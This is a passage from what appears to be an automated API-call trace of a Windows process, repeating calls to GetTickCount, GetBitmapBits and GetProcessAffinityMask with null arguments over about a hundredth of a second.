lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.488] GetTickCount () returned 0x2004fea [0099.488] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.488] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.488] GetTickCount () returned 0x2004fea [0099.488] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.488] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.489] GetTickCount () returned 0x2004fea [0099.489] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.489] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.489] GetTickCount () returned 0x2004fea [0099.489] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.489] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.489] GetTickCount () returned 0x2004fea [0099.489] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.489] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.489] GetTickCount () returned 0x2004fea [0099.489] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.489] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.489] GetTickCount () returned 0x2004fea [0099.490] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.490] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.490] GetTickCount () returned 0x2004fea [0099.490] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.490] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.490] GetTickCount () returned 0x2004fea [0099.490] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.490] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.490] GetTickCount () returned 0x2004fea [0099.490] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.490] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.490] GetTickCount () returned 0x2004fea [0099.490] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.490] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.491] GetTickCount () returned 0x2004ffa [0099.491] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.491] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.491] GetTickCount () returned 0x2004ffa [0099.491] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.491] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.491] GetTickCount () returned 0x2004ffa [0099.491] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.491] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.491] GetTickCount () returned 0x2004ffa [0099.491] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.491] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.492] GetTickCount () returned 0x2004ffa [0099.492] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.492] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.492] GetTickCount () returned 0x2004ffa [0099.492] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.492] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.492] GetTickCount () returned 0x2004ffa [0099.492] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.492] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.492] GetTickCount () returned 0x2004ffa [0099.492] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.492] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.492] GetTickCount () returned 0x2004ffa [0099.492] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.492] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.493] GetTickCount () returned 0x2004ffa [0099.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.493] GetTickCount () returned 0x2004ffa [0099.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.493] GetTickCount () returned 0x2004ffa [0099.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.493] GetTickCount () returned 0x2004ffa [0099.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.493] GetTickCount () returned 0x2004ffa [0099.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.493] GetTickCount () returned 0x2004ffa [0099.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.493] GetTickCount () returned 0x2004ffa [0099.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.493] GetTickCount () returned 0x2004ffa [0099.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.493] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.493] GetTickCount () returned 0x2004ffa [0099.493] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.494] GetTickCount () returned 0x2004ffa [0099.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.494] GetTickCount () returned 0x2004ffa [0099.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.494] GetTickCount () returned 0x2004ffa [0099.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.494] GetTickCount () returned 0x2004ffa [0099.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.494] GetTickCount () returned 0x2004ffa [0099.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.494] GetTickCount () returned 0x2004ffa [0099.494] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.494] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.494] GetTickCount () returned 0x2004ffa [0099.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.495] GetTickCount () returned 0x2004ffa [0099.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.495] GetTickCount () returned 0x2004ffa [0099.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.495] GetTickCount () returned 0x2004ffa [0099.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.495] GetTickCount () returned 0x2004ffa [0099.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.495] GetTickCount () returned 0x2004ffa [0099.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.495] GetTickCount () returned 0x2004ffa [0099.495] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.495] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.496] GetTickCount () returned 0x2004ffa [0099.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.496] GetTickCount () returned 0x2004ffa [0099.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.496] GetTickCount () returned 0x2004ffa [0099.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.496] GetTickCount () returned 0x2004ffa [0099.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.496] GetTickCount () returned 0x2004ffa [0099.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.496] GetTickCount () returned 0x2004ffa [0099.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.496] GetTickCount () returned 0x2004ffa [0099.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.496] GetTickCount () returned 0x2004ffa [0099.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.496] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.496] GetTickCount () returned 0x2004ffa [0099.496] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.497] GetTickCount () returned 0x2004ffa [0099.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.497] GetTickCount () returned 0x2004ffa [0099.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.497] GetTickCount () returned 0x2004ffa [0099.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.497] GetTickCount () returned 0x2004ffa [0099.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.497] GetTickCount () returned 0x2004ffa [0099.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.497] GetTickCount () returned 0x2004ffa [0099.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.497] GetTickCount () returned 0x2004ffa [0099.497] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.497] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.497] GetTickCount () returned 0x2004ffa [0099.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.498] GetTickCount () returned 0x2004ffa [0099.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.498] GetTickCount () returned 0x2004ffa [0099.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.498] GetTickCount () returned 0x2004ffa [0099.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.498] GetTickCount () returned 0x2004ffa [0099.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.498] GetTickCount () returned 0x2004ffa [0099.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.498] GetTickCount () returned 0x2004ffa [0099.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.498] GetTickCount () returned 0x2004ffa [0099.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.498] GetTickCount () returned 0x2004ffa [0099.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.499] GetTickCount () returned 0x2004ffa [0099.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.499] GetTickCount () returned 0x2004ffa [0099.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.499] GetTickCount () returned 0x2004ffa [0099.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.499] GetTickCount () returned 0x2004ffa [0099.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.499] GetTickCount () returned 0x2004ffa [0099.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.499] GetTickCount () returned 0x2004ffa [0099.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.499] GetTickCount () returned 0x2004ffa [0099.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.499] GetTickCount () returned 0x2004ffa [0099.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.500] GetTickCount () returned 0x2004ffa [0099.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.500] GetTickCount () returned 0x2004ffa [0099.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.500] GetTickCount () returned 0x2004ffa [0099.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.500] GetTickCount () returned 0x2004ffa [0099.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.500] GetTickCount () returned 0x2004ffa [0099.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.500] GetTickCount () returned 0x2004ffa [0099.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.500] GetTickCount () returned 0x2004ffa [0099.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0099.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.500] GetTickCount () returned 0x2004ffa [0099.501] GetBitmapBits (in: hbit=0x0, 